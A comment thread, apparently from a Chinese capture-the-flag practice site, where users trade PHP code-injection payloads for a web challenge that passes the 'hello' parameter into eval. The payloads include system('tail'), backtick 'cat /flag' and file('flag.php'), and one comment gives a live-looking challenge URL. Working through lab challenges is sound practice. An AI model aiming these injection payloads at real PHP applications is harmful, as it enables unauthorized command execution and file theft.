/?hello=system("tail%20-n%202%20flag.php")
我真棒
hello=highlight_file('./flag.php') highlight_file() 使用highlight()函数能在编译器编译后能显示出文件源代码,并且在浏览器中打开时也能显示源代码。
踩坑了用这个file_get_contents(“/flag”); 读了半天都是只显示长度没有内容
http://114.67.175.224:10794/?hello=file(%27flag.php%27)
@D4C 构造php函数,看代码,vardump函数用于打印变量信息,file函数获取的是flag.php源文件,此时使用vardump打印即是包括注释的flag.php源代码,flag就出来了
大佬能不能给小白讲讲原理啊
有eval可能有命令提交漏洞,知道本题引用了“flag.php”,便可以通过file函数将eval("var_dump($a);")就是把$a的内容打印出来
/?hello="flag.php"
知识点: 1.$a= @$_REQUEST['hello']Request:使用 Request 对象访问任何基于 HTTP 请求传递的所有信息 2.eval("var_dump($a);")就是把$a的内容打印出来 3.file()解释: file(path,include_path,context) 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换
?hello=`cat /flag`
@sxiaobai system函数里的东西要加引号
为什么?hello=system(cat /flag)不行啊
直接给hello复制传到a上,然后页面会将a的信息显示出来。 ?hello=file('flag.php')
...
评论
aoikuuun 1年前
举报
/?hello=system("tail%20-n%202%20flag.php")
GH0S7 1年前
举报
我真棒
K463726543 1年前
举报
hello=highlight_file('./flag.php') highlight_file() 使用highlight()函数能在编译器编译后能显示出文件源代码,并且在浏览器中打开时也能显示源代码。
SecI302 1年前
举报
踩坑了用这个file_get_contents(“/flag”); 读了半天都是只显示长度没有内容
Cat00011cat 1年前
举报
http://114.67.175.224:10794/?hello=file(%27flag.php%27)
musewithwind 1年前
举报
@D4C 构造php函数,看代码,vardump函数用于打印变量信息,file函数获取的是flag.php源文件,此时使用vardump打印即是包括注释的flag.php源代码,flag就出来了
D4C 1年前
举报
大佬能不能给小白讲讲原理啊
小王爱吃螺蛳粉 1年前
举报
有eval可能有命令提交漏洞,知道本题引用了“flag.php”,便可以通过file函数将eval("var_dump($a);")就是把$a的内容打印出来
风灵丨玉秀 1年前
举报
/?hello="flag.php"
cattact 1年前
举报
知识点: 1.$a= @$_REQUEST['hello']Request:使用 Request 对象访问任何基于 HTTP 请求传递的所有信息 2.eval("var_dump($a);")就是把$a的内容打印出来 3.file()解释: file(path,include_path,context) 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换
solomony 1年前
举报
?hello=`cat /flag`
karter 1年前
举报
@sxiaobai system函数里的东西要加引号
sxiaobai 1年前
举报
为什么?hello=system(cat /flag)不行啊
布吉岛 1年前
举报
直接给hello复制传到a上,然后页面会将a的信息显示出来。 ?hello=file('flag.php')